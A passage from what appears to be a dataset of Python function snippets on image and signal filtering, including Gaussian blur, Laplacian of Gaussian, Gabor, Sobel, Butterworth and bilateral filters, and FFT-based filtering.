modification\n for i in range(i_x):\n x_bound = i_x - i\n mod_wT = wT.copy()\n if i < radi:\n mod_wT[0:radi-i] = 0 \n new_wT_sum = mod_wT.sum()\n mod_wT = mod_wT*old_wT_sum/new_wT_sum \n if i > i_x - radi - 1:\n mod_wT[-1:-radi+x_bound-1:-1] = 0 \n new_wT_sum = mod_wT.sum()\n mod_wT = mod_wT*old_wT_sum/new_wT_sum \n for j in range(i_y):\n gauss_image[i,j] = np.sum(temp_image[i:i+f,j+radi]*mod_wT.T)\n\n return gauss_image", "def filter_gradient(self):\n error = self.error()\n error_shape = error.shape[1:3]\n input_ = self.get_cache('input')\n h = input_.shape[1]\n w = input_.shape[2]\n # TODO: check that this padding is correct. I am not sure it gets it right when the number of 0s to add is odd.\n pad_l, pad_t = (error_shape[0] - 1) // 2, (error_shape[1] - 1) // 2\n pad_r, pad_b = (error_shape[0] - 1) - pad_l, (error_shape[1] - 1) - pad_t\n padded_input = np.pad(input_, ((0, 0), (pad_l, pad_r), (pad_t, pad_b), (0, 0)), 'constant')\n # TODO: this assumes 'same' padding. 
support other types.\n # TODO: I wanted to use np.from_function but kept getting an IndexError, so we'll use a nested for loop for now\n grads = np.zeros(self.filter.shape)\n for m in range(grads.shape[0]):\n for n in range(grads.shape[1]):\n for k in range(grads.shape[2]):\n for r in range(grads.shape[3]):\n grads[m, n, k, r] = np.sum(error[:, :, :, r] * padded_input[:, m: m + h, n: n + w, k])\n return grads", "def log_filter(stack, sigma):\n stack_cp = stack.astype(np.int16)\n gauss = ndi.filters.gaussian_filter(stack_cp, sigma=sigma)\n log = ndi.filters.laplace(gauss)\n return log", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def gaussian_filter(stddev, array):\n\n return astropy.convolution.convolve(\n array, astropy.convolution.Gaussian2DKernel(stddev))", "def compute_filter_ips_self(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f, f, spec_corr, psd) for f in lal_filters])", "def createDefaultFilterbank(window):\n # Gaussians:: G1 = N(0, 1), G2 = N(0, 2), G3 = N(0, 4)\n # Laplacian of Gaussians:: LoG1 = Lap(N(0, 1)), LoG2=Lap(N(0, 2)), LoG3=Lap(N(0, 4)), LoG4=Lap(N(0, 8))\n # Derivative of Gaussian (x):: Div1xG1 = d/dx N(0,2), Div1xG2=d/dx N(0,4)\n # Derivative of Gaussian (y): Div1yG1 = d/dy N(0,2), Div1yG2=d/dy N(0,4)\n \n G1 = gaussian_kernel(window, window, 1)\n G2 = gaussian_kernel(window, window, 2)\n G3 = gaussian_kernel(window, window, 4)\n \n # see http://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm\n LoG1 = laplacianOfGaussian_kernel(window, window, 1)\n LoG2 = laplacianOfGaussian_kernel(window, window, 2)\n LoG3 = laplacianOfGaussian_kernel(window, window, 4)\n LoG4 = laplacianOfGaussian_kernel(window, window, 8)\n \n dx_G1 = gaussian_1xDerivative_kernel(window, window, 2)\n dx_G2 = gaussian_1xDerivative_kernel(window, window, 4)\n \n dy_G1 = gaussian_1yDerivative_kernel(window, window, 2)\n dy_G2 = gaussian_1yDerivative_kernel(window, window, 4)\n \n return np.array([G1, G2, G3, LoG1, LoG2, LoG3, LoG4, dx_G1, dx_G2, dy_G1, dy_G2])", "def gaussian_filter(self, sigma):\n\n mask = self.get_weighted_mask()\n mask_f = ni.gaussian_filter(mask, sigma=sigma)\n\n return SpatialReceptiveField(mask_f, self.altPos, self.aziPos, sign=self.sign,\n temporalWindow=self.temporalWindow, pixelSizeUnit=self.pixelSizeUnit,\n dataType=self.dataType, thr=self.thr, filter_sigma=sigma,\n interpolate_rate=self.interpolate_rate)", "def isotropic_Gaussian(ksize=15, l=6):\n\n V = np.array([[1, 0], [0, -1]])\n D = np.array([[l, 0], [0, l]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gs_blur(self,k,img):\n SIG = self.sigma\n sig = [SIG,k*SIG,k*k*SIG,k*k*k*SIG,k*k*k*k*SIG]\n gsArray = [0,1,2,3,4]\n scaleImages = [0,1,2,3,4]\n \n for i in range(5):\n gsArray[i] = scipy.ndimage.filters.gaussian_filter(img,sig[i])\n\n return gsArray", "def create_gaussian_filter(size, sigma):\n h = size[0] #height of the template\n w = size[1] #width of the template \n if h % 2 == 0: h += 1 #add 1 if dimensions are even\n if w % 2 == 0: w += 1\n x = math.floor(h/2)\n y = math.floor(w/2) \n sum = 0\n #create our template\n template = np.zeros((h,w))\n #fill the template in with the numbers from Gaussian distribution\n for i in range(h):\n for j in range(w):\n template[i,j] = math.exp(-((((j-x)**2)+((i-y)**2))/(2*(sigma**2))))\n sum = sum + template[i,j]\n 
#normalise the numbers\n gaussian_filter = template/sum\n return gaussian_filter", "def filter(self):\n\n # Calculate outliers in the multivariate Gaussian distribution analysis.\n # Returns the outliers as vector and an Ellipse object for plotting\n outliers, self._ellipse = multivariate_gaussian(\n self.liedataframe[['coul', 'vdw']],\n confidence=self.settings.confidence,\n returnellipse=True,\n edgecolor='red',\n facecolor='none')\n\n # Register outliers.\n self.liedataframe['filter_mask'] = self.liedataframe['filter_mask'].values + numpy.array(outliers)\n\n # Check outliers for any cases leading to all but one pose to be marked as\n # outlier. Not wise to include this in the boltzmann weighted sheme.\n logger.info(\n \"Outlier detection. Outliers: {0} of {1} points, method: Multivariate Gaussian distribution.\"\n \"Confidence interval {2:.3f}\".format(\n outliers.sum(), self.liedataframe[['coul', 'vdw']].size, self.settings.confidence))\n\n return self.liedataframe", "def differenceOfGausssians(image,sigma0, sigma1,window_size, roi, out = None):\n return (vigra.filters.gaussianSmoothing(image,sigma0,window_size=window_size,roi = roi)-vigra.filters.gaussianSmoothing(image,sigma1,window_size=window_size,roi = roi))", "def smooth(img, sigma):\n if sigma < 0:\n raise ValueError('smoothing kernel size is negative')\n elif sigma == 0:\n return img.get_data()\n else:\n sigma_vox = sigma / np.sqrt(np.sum(img.get_affine()[0:3, 0:3] ** 2, 0))\n return nd.gaussian_filter(img.get_data(), sigma_vox)", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def edgesMarrHildreth(img, sigma):\n\tsize = int(2*(np.ceil(3*sigma))+1)\n\n\tx, y = np.meshgrid(np.arange(-size/2+1, size/2+1), np.arange(-size/2+1, size/2+1))\n\t\n\tnormal = 1 / (2.0 * np.pi * sigma**2)\n\n\tkernel = ((x**2 + y**2 - (2.0*sigma**2)) / sigma**4) * np.exp(-(x**2+y**2) / (2.0*sigma**2)) / normal # LoG filter\n\n\tkern_size = kernel.shape[0]\n\tlog = np.zeros_like(img, dtype=float)\n\n\t# applying filter\n\tfor i in range(img.shape[0]-(kern_size-1)):\n\t\tfor j in range(img.shape[1]-(kern_size-1)):\n\t\t\twindow = img[i:i+kern_size, j:j+kern_size] * kernel\n\t\t\tlog[i,j] = np.sum(window)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\tlog = log.astype(np.int64, copy=False)\n\n\tzero_crossing = np.zeros_like(log)\n\n\t# computing zero crossing\n\tfor i in range(log.shape[0]-(kern_size-1)):\n\t\tfor j in range(log.shape[1]-(kern_size-1)):\n\t\t\tif log[i][j] == 0:\n\t\t\t\tif (log[i][j-1] < 0 and log[i][j+1] > 0) or (log[i][j-1] < 0 and log[i][j+1] < 0) or (log[i-1][j] < 0 and log[i+1][j] > 0) or (log[i-1][j] > 0 and log[i+1][j] < 0):\n\t\t\t\t\tzero_crossing[i][j] = 255\n\t\t\tif log[i][j] < 0:\n\t\t\t\tif (log[i][j-1] > 0) or (log[i][j+1] > 0) or (log[i-1][j] > 0) or (log[i+1][j] > 0):\n\t\t\t\t\tzero_crossing[i][j] = 255 \n\n\t# plotting images\n\tfig = plt.figure()\n\ta =fig.add_subplot(1,2,1)\n\timgplot = plt.imshow(log, cmap='gray')\n\ta.set_title('Laplacian of Gaussian')\n\ta = fig.add_subplot(1,2,2)\n\timgplot = plt.imshow(zero_crossing, cmap='gray')\n\tstring = 'Zero Crossing sigma = '\n\tstring += 
(str(sigma))\n\ta.set_title(string)\t\n\tplt.show()\n\t\n\treturn zero_crossing", "def test_gaussian_filter():\n\n def rgb2gray(rgb):\n r, g, b = rgb[:, :, 0], rgb[:, :, 1], rgb[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\n img = rgb2gray(np.array(Image.open('data/graf.png')))\n gx, x = gauss_module.gauss(4)\n gx = gx.reshape(1, gx.shape[0])\n gy = gx.reshape(gx.shape[1], gx.shape[0])\n smooth_img = conv2(img, gx * np.array(gy))\n\n test_smooth_img = gauss_module.gaussianfilter(img, 4)\n\n assert np.all(smooth_img.round(5) == test_smooth_img.round(5))", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 9, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def pseudo_flatfield(img_plane, sigma=5):\n filtered_img = gaussian_filter(img_plane, sigma)\n return img_plane / (filtered_img + 1)", "def smooth_gauss(image, variance=2, kernel_size=(9, 9)):\n return cv2.GaussianBlur(image, kernel_size, variance)", "def __gaussian_blur(self, img, kernel_size=3):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def apply_smoothing(image, kernel_size=3):\n return cv2.GaussianBlur(image, (kernel_size, kernel_size), 0)", "def gaussian_blur(self,img):\n return cv2.GaussianBlur(img, (self.kernel_size, self.kernel_size), 0)", "def _gap_filter(self):\n res = self.cfg.resolution\n xedges = np.linspace(self.lrx[0]-res/2., self.lrx[-1]+res/2.0, len(self.lrx)+1)\n yedges = np.linspace(self.lry[0]-res/2., self.lry[-1]+res/2.0, len(self.lry)+1)\n\n # Calculates point density of als shots per DEM grid cell\n self.rzhist, xe, ye = np.histogram2d(self.x[self.nonan].flatten(),\n self.y[self.nonan].flatten(),\n bins=[xedges, yedges])\n self.rzhist = self.rzhist.transpose()\n data_mask = self.rzhist > 0.0\n\n filter_algorithm = self.cfg.gap_filter[\"algorithm\"]\n if filter_algorithm == \"maximum_filter\":\n data_mask = maximum_filter(data_mask, **self.cfg.gap_filter[\"keyw\"])\n else:\n raise NotImplementedError(\"Filter algorithm: %s\" % filter_algorithm)\n\n self.dem_mask = ~data_mask", "def gaborFilter(img, ksize=31):\n filters = []\n #ksize = 31\n for theta in np.arange(0, np.pi, np.pi / 16):\n kern = cv2.getGaborKernel((ksize, ksize), 4.0, theta, 10.0, 0.5, 0, ktype=cv2.CV_32F)\n kern /= 1.5*kern.sum()\n filters.append(kern)\n accum = np.zeros_like(img)\n for ker in filters:\n fimg = cv2.filter2D(img, cv2.CV_8UC3, ker)\n np.maximum(accum, fimg, accum)\n return accum", "def filtering(self):\r\n # 1 ###########################################################################################################\r\n fft_image = np.fft.fft2(self.image)\r\n # 2 ###########################################################################################################\r\n fft_shift_image = np.fft.fftshift(fft_image)\r\n\r\n ###\r\n mag_dft = np.log(np.abs(fft_shift_image))\r\n mag_dft = (255 * (mag_dft / np.max(mag_dft))).astype(dtype='uint8')\r\n ###\r\n\r\n # 3 ###########################################################################################################\r\n if self.filter_name == 'butterworth_l' or self.filter_name == 'butterworth_h':\r\n mask = self.filter(fft_shift_image.shape, self.cutoff, self.order)\r\n else:\r\n mask = self.filter(fft_shift_image.shape, self.cutoff)\r\n # 4 ###########################################################################################################\r\n # multiply the dft 
(fft shift image) by the mask\r\n filtered_image = fft_shift_image * mask\r\n\r\n ###\r\n mag_filtered_image = mag_dft * mask\r\n ###\r\n\r\n # 5 ###########################################################################################################\r\n inverse_fft_shift_image = np.fft.ifftshift(filtered_image)\r\n # 6 ###########################################################################################################\r\n inverse_fft_image = np.fft.ifft2(inverse_fft_shift_image)\r\n # 7 ###########################################################################################################\r\n mag_image = np.zeros(inverse_fft_image.shape, dtype=complex)\r\n for i in range(inverse_fft_image.shape[0]):\r\n for j in range(inverse_fft_image.shape[1]):\r\n if inverse_fft_image[i][j] < 0:\r\n mag_image[i][j] = -1 * inverse_fft_image[i][j]\r\n else:\r\n mag_image[i][j] = inverse_fft_image[i][j]\r\n # magnitude of inverse fft is complete\r\n # 8 ###########################################################################################################\r\n full_contrast_image = self.post_process_image(mag_image)\r\n\r\n return [mag_dft, mag_filtered_image, full_contrast_image]", "def apply_filter(self, image):\n pass", "def smooth_image(self, image, mask):\n \n filter_size = self.smoothing_filter_size.value\n if filter_size == 0:\n return image\n sigma = filter_size / 2.35\n #\n # We not only want to smooth using a Gaussian, but we want to limit\n # the spread of the smoothing to 2 SD, partly to make things happen\n # locally, partly to make things run faster, partly to try to match\n # the Matlab behavior.\n #\n filter_size = max(int(float(filter_size) / 2.0),1)\n f = (1/np.sqrt(2.0 * np.pi ) / sigma * \n np.exp(-0.5 * np.arange(-filter_size, filter_size+1)**2 / \n sigma ** 2))\n def fgaussian(image):\n output = scipy.ndimage.convolve1d(image, f,\n axis = 0,\n mode='constant')\n return scipy.ndimage.convolve1d(output, f,\n axis = 1,\n mode='constant')\n #\n # Use the trick where you similarly convolve an array of ones to find \n # out the edge effects, then divide to correct the edge effects\n #\n edge_array = fgaussian(mask.astype(float))\n masked_image = image.copy()\n masked_image[~mask] = 0\n smoothed_image = fgaussian(masked_image)\n masked_image[mask] = smoothed_image[mask] / edge_array[mask]\n return masked_image", "def filter_unsharp(img: np.ndarray, blur_algo='median', kernel_size=None, strength=0.3, unsharp_algo='laplacian'):\n #h,w,c = img.shape\n imgtype = img.dtype\n \n #can randomize strength from 0.5 to 0.8\n # if strength is None:\n # strength = np.random.uniform(0.3, 0.9)\n \n if unsharp_algo == 'DoG':\n #If using Difference of Gauss (DoG)\n #run a 5x5 gaussian blur then a 3x3 gaussian blr\n blur5 = cv2.GaussianBlur(img,(5,5),0)\n blur3 = cv2.GaussianBlur(img,(3,3),0)\n DoGim = blur5 - blur3\n img_out = img - strength*DoGim\n \n else: # 'laplacian': using LoG (actually, median blur instead of gaussian)\n #randomize kernel_size between 1, 3 and 5\n if kernel_size is None:\n kernel_sizes = [1, 3, 5] #TODO: ks 5 is causing errors\n kernel_size = random.choice(kernel_sizes)\n # Median filtering (could be Gaussian for proper LoG)\n #gray_image_mf = median_filter(gray_image, 1)\n if blur_algo == 'median':\n smooth = cv2.medianBlur(img.astype(np.uint8), kernel_size)\n # Calculate the Laplacian (LoG, or in this case, Laplacian of Median)\n lap = cv2.Laplacian(smooth,cv2.CV_64F)\n # Calculate the sharpened image\n img_out = img - strength*lap\n \n # Saturate the pixels in 
either direction\n img_out[img_out>255] = 255\n img_out[img_out<0] = 0\n \n return img_out.astype(imgtype)", "def test_filter_linear(self):\n input_image = np.array([\n 0.01, 0.1, 0.2, 0.5, 0.75, 0.99\n ])\n expected_image_lower = np.array([\n 0.240, 0.329, 0.427, 0.725, 0.974, 1.213\n ])\n expected_image_upper = np.array([\n 0.241, 0.330, 0.428, 0.726, 0.975, 1.214\n ])\n output_config = FilterImageConfig()\n output_config.blur.linear = True\n output_config.blur.sigma = 5\n output_config.effect.mode = \"global\"\n output_config.effect.lum_scale = 5\n output_config.effect.chrom_scale = .1\n output_config.effect.level = 5\n output = localHDR.filter_image(input_image, output_config)\n self.assertTrue(np.allclose(output, expected_image_lower, atol=6e-03))\n self.assertTrue(np.allclose(output, expected_image_upper, atol=6e-03))", "def _filter_gauss(image: np.array,\n axis: str,\n krnsize: int,\n krnsigma: float):\n assert(axis == 'x' or axis == 'y')\n krn = cv.getGaussianKernel(krnsize, krnsigma)\n krn = krn * krn.T\n krny, krnx = np.gradient(krn)\n\n if axis == 'x':\n return _filter_custom(image, krnx)\n elif axis == 'y':\n return _filter_custom(image, krny)", "def remove_bao_gaussian_filtering(self, k, pk, Lambda = 0.25):\n # Extrapolate\n kLinear, pLinear = UF.extrapolate_log(k, pk, 1e-6, 1e6)\n dqlog = np.diff(np.log10(kLinear))[0]\n\n # EH spectrum with rescaling\n pEH = self.EisensteinHu_nowiggle_Pk(z=0, k=kLinear)[1][0]\n pEH /= pEH[0]/pLinear[0]\n\n # Smooth, interpolate and evaluate\n smoothPowerSpectrum = gaussian_filter1d(pLinear/pEH, Lambda/dqlog)*pEH\n smoothPowerSpectrum_int = si.interp1d(kLinear,smoothPowerSpectrum,'cubic')\n smoothPowerSpectrum = smoothPowerSpectrum_int(k)\n\n return smoothPowerSpectrum", "def gaussian2d(filter_size=5, sig=1.0):\n ax = np.arange(-filter_size // 2 + 1., filter_size // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)) / np.square(sig))\n return kernel / np.sum(kernel)", "def bilateral_filter(img, n, sigma_s, sigma_r):\n filter_ = build_filter(n, sigma_s)\n \n original_shape = list(img.shape)\n\n pad = n//2\n img = padding(img, pad)\n \n new_img = np.zeros_like(img)\n\n for i in range(pad, original_shape[0]+pad):\n for j in range(pad, original_shape[1]+pad):\n # Operations happen vectorially around img[i][j]\n \n # Grid centered in img[i][j]\n sub_matrix = img[i-pad:i+pad+1, j-pad:j+pad+1]\n\n gr = gaussian(sub_matrix-img[i][j], sigma_r)\n \n wt = np.multiply(gr, filter_)\n w = np.sum(wt)\n\n pixel = np.sum(np.multiply(wt, sub_matrix))\n pixel = pixel/w\n\n new_img[i][j] = pixel\n\n new_img = unpadding(new_img, pad)\n \n return new_img", "def blurImage1(in_image: np.ndarray, kernel_size: np.ndarray) -> np.ndarray:\r\n size = kernel_size[0]\r\n sigma = 1\r\n x, y = np.mgrid[-size:size + 1, -size:size + 1]\r\n normal = 1 / (2.0 * np.pi * sigma ** 2)\r\n g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2))) * normal\r\n in_image = cv2.filter2D(in_image, -1, g)\r\n return in_image", "def gaussian_blurring(self,input_image,kernel_size,sigma):\n #Applying Gaussian Blur filter\n output_image=cv2.GaussianBlur(input_image,kernel_size,sigma)\n return output_image", "def get_butterworth_low_pass_filter(shape, cutoff, order):\n \n \n print(\"butterworth_low_pass_filter = \")\n print(\"cutoff: \",cutoff)\n print(\"order: \",order)\n filter = np.zeros(shape)\n for i in range(shape[0]):\n for j in range(shape[1]):\n D = np.sqrt((i - (shape[0] / 2)) ** 2 + (j - (shape[1] / 2)) ** 2)\n filter[i, j] = 1 / (1 + (D / 
cutoff) ** (2 * order))\n # print(\"\\n\\n\\n\\n\")\n # print(filter)\n # return filter\n return process_filter(image, filter)", "def moffat_convolution(im_array,n_fwhm,beta,fwhm) :\n\n r_s = fwhm/(2. *math.sqrt(2.**(1./beta)-1.))\n\t\n im_kernel_array = gauss_kernel(n_fwhm,beta,r_s)\n conv_image = signal.convolve(im_array,im_kernel_array,mode = 'same')\n\n return (conv_image)", "def features_sigma(img,\n sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def sobelfilter(D, W):\n here, plus, minus = slice(1, -1), slice(2, None), slice(None, -2)\n # Estimate slopes along each axis at each pixel.\n Dx = 0.5 * (D[:, plus] - D[:, minus])\n Dy = 0.5 * (D[plus, :] - D[minus, :])\n # Calculate the corresponding inverse variances.\n Wp, Wm = W[:, plus], W[:, minus]\n Wx = 0.25 * np.divide(Wp * Wm, Wp + Wm, out=np.zeros_like(Wp), where=Wp + Wm > 0)\n Wp, Wm = W[plus, :], W[minus, :]\n Wy = 0.25 * np.divide(Wp * Wm, Wp + Wm, out=np.zeros_like(Wp), where=Wp + Wm > 0)\n # Average slope estimates along the other axis with weights (1, 2, 1).\n WDx = Wx[minus, :] * Dx[minus, :] + 2 * Wx[here, :] * Dx[here, :] + Wx[plus, :] * Dx[plus, :]\n Wxsum = Wx[minus, :] + 2 * Wx[here, :] + Wx[plus, :]\n Dx = np.divide(WDx, Wxsum, out=np.zeros_like(WDx), where=Wxsum > 0)\n WDy = Wy[:, minus] * Dy[:, minus] + 2 * Wy[:, here] * Dy[:, here] + Wy[:, plus] * Dy[:, plus]\n Wysum = Wy[:, minus] + 2 * Wy[:, here] + Wy[:, plus]\n Dy = np.divide(WDy, Wysum, out=np.zeros_like(WDy), where=Wysum > 0)\n # Estimate the 2D gradient magnitude.\n Dg = np.zeros_like(D)\n Dg[here, here] = np.hypot(Dx, Dy)\n return Dg", "def __preliminar_image(self,img,name):\n\n\n height, width, _ = img.shape\n #self.__showImage(img,name)\n img_gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n kernel_size = (3,3)\n gauss_img = cv2.GaussianBlur(img,kernel_size,0)\n \n img_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n \n l_red_hsv = np.array([0, 100, 100], dtype = np.uint8)\n u_red_hsv = np.array([10, 255, 255], dtype = np.uint8)\n l_red_hsv2 = np.array([160, 100, 100], dtype = np.uint8)\n \n 
u_red_hsv2 = np.array([179, 255, 255], dtype = np.uint8)\n red_mask_hsv1 = cv2.inRange(img_hsv,l_red_hsv,u_red_hsv)\n red_mask_hsv2 = cv2.inRange(img_hsv,l_red_hsv2,u_red_hsv2)\n red_mask_hsv = red_mask_hsv1 + red_mask_hsv2\n \n l_red = np.array([0,0, 80], dtype = np.uint8)\n u_red = np.array([50,50, 255], dtype = np.uint8)\n red_mask = cv2.inRange(img, l_red, u_red)\n \n filter_byw = red_mask +red_mask_hsv \n filter_img = cv2.bitwise_and(gauss_img, gauss_img, mask=cv2.bitwise_or(red_mask,red_mask_hsv))\n \n return filter_img, filter_byw", "def build_laplacian_pyramid(im, max_levels, filter_size):\n pyr = []\n org_reduce, filter_vec = build_gaussian_pyramid(im, max_levels, filter_size)\n for i in range(max_levels - 1):\n temp_expand = expand(org_reduce[i + 1], filter_vec)\n org_layer = org_reduce[i]\n temp = org_layer - temp_expand\n pyr.append(temp)\n # plt.imshow(org_reduce[-1], cmap='gray')\n # plt.show()\n pyr.append(org_reduce[-1])\n return pyr, filter_vec", "def compute(self):\n Y = self.data[1]\n # Create an order 3 lowpass butterworth filter\n b, a = signal.butter(3, 0.05)\n # Apply the filter to Y. Use lfilter_zi to choose the initial condition of the filter\n zi = signal.lfilter_zi(b, a)\n z, _ = signal.lfilter(b, a, Y, zi=zi * Y[0])\n # Apply the filter again, to have a result filtered at an order the same as filtfilt\n z2, _ = signal.lfilter(b, a, z, zi=zi * z[0])\n # Use filtfilt to apply the filter\n self.data[2] = signal.filtfilt(b, a, Y)\n self.data[3] = self.data[2] - self.data[1] - self.dataSpan * 0.3\n self.updatePlot()", "def lowpass(data,filterSize=None):\n\n def convolve(signal,kernel):\n pad=np.ones(len(kernel)/2)\n signal=np.concatenate((pad*signal[0],signal,pad*signal[-1]))\n signal=np.convolve(signal,kernel,mode='same')\n signal=signal[len(pad):-len(pad)]\n return signal\n\n def kernel_gaussian(size=100, sigma=None, forwardOnly=False):\n if sigma is None:\n sigma=size/10\n size=int(size)\n points=np.exp(-np.power(np.arange(size)-size/2,2)/(2*np.power(sigma,2)))\n if forwardOnly:\n points[:int(len(points)/2)]=0\n return points/sum(points)\n\n if filterSize is None:\n filterSize=len(data)/10\n kernel=kernel_gaussian(size=filterSize)\n data=convolve(data,kernel) # do the convolution with padded edges\n return data", "def run_gaussian_smoothing(image, kernel_size=5):\n return cv2.GaussianBlur(image, (kernel_size, kernel_size), 0)", "def filtering(self):\n from numpy import fft\n import numpy as np\n\n _image_dft = fft.fft2(self.image)\n _image_dft = fft.fftshift(_image_dft)\n # dft = DFT.DFT()\n # plt.figure(1) \n # plt.imshow(self.image)\n # plt.figure(2)\n # plt.imshow(20*np.log10(abs(_image_dft))) \n # print(_image_dft)\n # print(abs(_image_dft))\n # plt.show()\n filter = self.filter(self.image.shape, self.cutoff, self.order) \\\n if self.filter_name.startswith('butterworth') \\\n else self.filter(self.image.shape, self.cutoff)\n \n _image_dft_filtered = _image_dft * filter\n _image_filtered = abs(fft.ifft2(_image_dft_filtered))\n \n return [ self.post_process_image(_image_filtered), \\\n self.post_process_image(20*np.log10(abs(_image_dft)+.00001)), \\\n self.post_process_image(20*np.log10(abs(_image_dft_filtered)+.00001)) ]", "def og_features(scan,filt=None,base_noise=None,thresh=-1.4781e-10,diff=1,verbose=False,scale=10):\n #get gradients of data\n der = np.array(np.gradient(scan,diff))\n \n #calculate gardient magnitudes and directions\n der_mag = np.linalg.norm(der,axis=0) \n der_uvecs = der/der_mag\n \n z_cur = np.copy(scan).ravel()\n\n #estimate noise level 
and set derivative filter threshold\n if filt is None:\n filt = np.mean(signaltonoise(der_mag)[-1])\n \n \n if base_noise is not None:\n filt = np.maximum(filt,base_noise)\n \n\n\n #filter directions and magnitudes\n x, y, z = der_uvecs[0].ravel(), der_uvecs[1].ravel(), der_mag.ravel()\n \n #filter using threshold and filt\n x_filt, y_filt, z_filt = x[z_cur>thresh], y[z_cur>thresh], z[z_cur>thresh]\n #x_filt, y_filt, z_filt = x, y, z\n\n \n #print(len(z_filt))\n x_filt, y_filt, z_filt = x_filt[z_filt>filt], y_filt[z_filt>filt], z_filt[z_filt>filt]\n\n \n #calculate angles\n angles_filt = np.sign(y_filt)*np.arccos(x_filt/1)\n\n \n #print(len(angles_filt))\n \n if len(angles_filt) < 2:\n return 0,0,0\n \n #fit single line\n sol1 = least_squares(ress_1line,[-np.pi/2],args=(angles_filt,),bounds=[-np.pi,0],method='dogbox',jac='2-point',max_nfev=2000)\n\n #fit two lines by grid search\n #sol_grid = grid_search(ress_2line,angles_filt,[[-np.pi,0],[-np.pi,0]])\n \n \n singleline = sol1.x[0]\n \n mx = np.minimum(np.abs(singleline-(-np.pi)),np.abs(singleline))\n \n sol_grid = grid_search(ress_2line_pm,angles_filt,[[0,mx]],umid = singleline)\n spread_lines = sol_grid[1]\n sol_grid[1] = [singleline+spread_lines,singleline-spread_lines]\n \n \n #compute average of squared residuals for both cases\n resid1 = ress_1line(sol1.x,angles_filt)\n\n grid_c11 = np.average(np.power(resid1,2))\n \n grid_c11 = np.average(np.abs(resid1))\n \n grid_c21 = sol_grid[-1]\n \n \n multip = cotunnel_score2(scan,scan>thresh,diff,scale)\n \n final_grid2 = multip*(grid_c11-grid_c21)\n \n \n \"\"\"\n plt.scatter(angles_filt,z_filt,marker='x',c='k',s=15,linewidth=0.4)\n plt.axvline(sol1.x,color='b')\n plt.axvline(sol1.x+(np.pi),color='b')\n plt.axvline(sol_grid[1][0],0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1],0,color='r', linestyle='--')\n \n plt.axvline(sol_grid[1][0]+(np.pi),0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1]+(np.pi),0,color='r', linestyle='--')\n \n plt.xlabel(\"$\\\\theta_g$ / rad\")\n \n plt.xlim([-np.pi,np.pi])\n plt.ylim([0,z.max()])\n \n \n plt.ylabel(\"$|g|$\")\n \n plt.xticks([-np.pi,0,np.pi])\n \n plt.locator_params(axis='y', nbins=2)\n \n plt.savefig(\"og_fig.svg\")\n \n plt.show()\n \"\"\"\n return final_grid2,multip,(grid_c11-grid_c21)", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn 